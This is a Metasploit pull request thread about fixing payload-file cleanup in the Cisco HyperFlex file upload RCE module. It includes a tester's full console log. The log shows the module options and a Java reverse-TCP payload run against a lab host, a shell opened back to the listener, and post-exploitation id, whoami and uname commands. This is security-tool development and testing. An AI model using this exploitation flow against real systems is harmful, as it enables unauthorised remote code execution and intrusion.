Fix for file clean up in the Cisco Hyperflex file upload RCE module

[jheysel-r7]

Fixes #15333 (comment).

[gwillcox-r7]

After much headbanging due to VMWare Networking issues and me just generally being silly, managed to confirm this works as expected:

msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > show options

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:h
                                                ost:port][...]
   RHOSTS            192.168.224.208  yes       The target host(s), range CIDR identifier, or
                                                hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  ccDDyhhmGo       no        Choose a filename for the payload. (Default is
                                                 random)
   VHOST                              no        HTTP server virtual host


Payload options (java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.224.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml
[+] Payload executed successfully
[*] Sending stage (2952 bytes) to 192.168.224.208
[+] Deleted /var/lib/tomcat7/webapps/crossdomain.xml.war
[+] Deleted /var/lib/tomcat7/webapps/crossdomain.xml/
[*] Command shell session 3 opened (192.168.224.128:4444 -> 192.168.224.208:50326) at 2021-08-02 15:24:32 -0500

id
uid=111(tomcat7) gid=114(tomcat7) groups=114(tomcat7),42(shadow)
whoami
tomcat7
uname -a
Linux HyperFlex-Installer-4.0.2d 4.4.0-75-generic #96-Ubuntu SMP Thu Apr 20 09:56:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

[wvu]

Thank you for testing this!!

[gwillcox-r7]

Release Notes

A bug has been fixed in the Cisco Hyperflex file upload RCE module that prevented it from properly deleting the uploaded payload files. Upload payload files should now be properly deleted.